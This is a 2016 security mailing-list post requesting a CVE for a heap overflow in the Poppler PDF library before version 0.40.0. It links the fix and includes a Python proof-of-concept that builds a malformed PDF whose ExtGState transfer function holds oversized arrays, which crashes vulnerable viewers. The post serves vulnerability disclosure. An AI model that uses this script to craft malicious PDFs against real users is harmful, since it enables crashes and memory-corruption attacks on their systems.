CVE request: Poppler < 0.40.0
From: Felipe <felipe.andres.manzano () gmail com>
Date: Mon, 11 Apr 2016 20:52:27 -0300
This is a clean heap overflow. The library is used in evince and okular and for previews in nautilus. Versions before 0.40.0 are vulnerable.

The patch: https://cgit.freedesktop.org/poppler/poppler/commit/?id=b3425dd3261679958cd56c0f71995c15d2124433

A crashy pdf file is attached.

PoC.py

from miniPDF.miniPDF import *
#from miniPDF.miniPDFO import *
import zlib

#The document
doc = PDFDoc()

#font
font = PDFDict()
font.add("Name", PDFName("F1"))
font.add("Subtype", PDFName("Type1"))
font.add("BaseFont", PDFName("Helvetica"))

#name:font map
fontname = PDFDict()
fontname.add("F1",font)

#resources
resources = PDFDict()
resources.add("Font",fontname)

data = '''BT /F1 24 Tf 240 700 Td (Pedefe Pedefeito endstream endobj obj 1 0 99 endobj Pedefeon!) Tj ET /GS3 gs'''

#contents
contentsDict = PDFDict()
contents= PDFStream({},data)
length = PDFNum(len(data))
doc.add(length)
contents.add('Length',PDFRef(length))

#page
page = PDFDict()
page.add("Type",PDFName("Page"))
page.add("Resources",resources)
page.add("Contents", PDFRef(contents))

#pages
pages = PDFDict()
pages.add("Type", PDFName("Pages"))
pages.add("Kids", PDFArray([PDFRef(page)]))
pages.add("Count", PDFNum(1))

#add parent reference in page
page.add("Parent",PDFRef(pages))

#catalog
catalog = PDFDict()
catalog.add("Type", PDFName("Catalog"))
catalog.add("Pages", PDFRef(pages))

doc.add([catalog,pages,page,contents])
doc.setRoot(catalog)

#The Function thing
function = PDFDict()
function.add("FunctionType",PDFNum(2))
function.add("Domain",PDFArray([0,1]))
function.add("N",PDFNum(100))
#2261634.5098039214
size = 10000000
function.add("C0",PDFArray([2261634.5098039214]*size))
function.add("C1",PDFArray([2261634.5098039214]*size))

extgstate = PDFDict()
extgstate.add("Type",PDFName("ExtGState"))
extgstate.add("TR",function)

resources.add("ExtGState","<< /GS3 "+str(extgstate)+">>")

print doc
Attachment:
crash.pdf.gz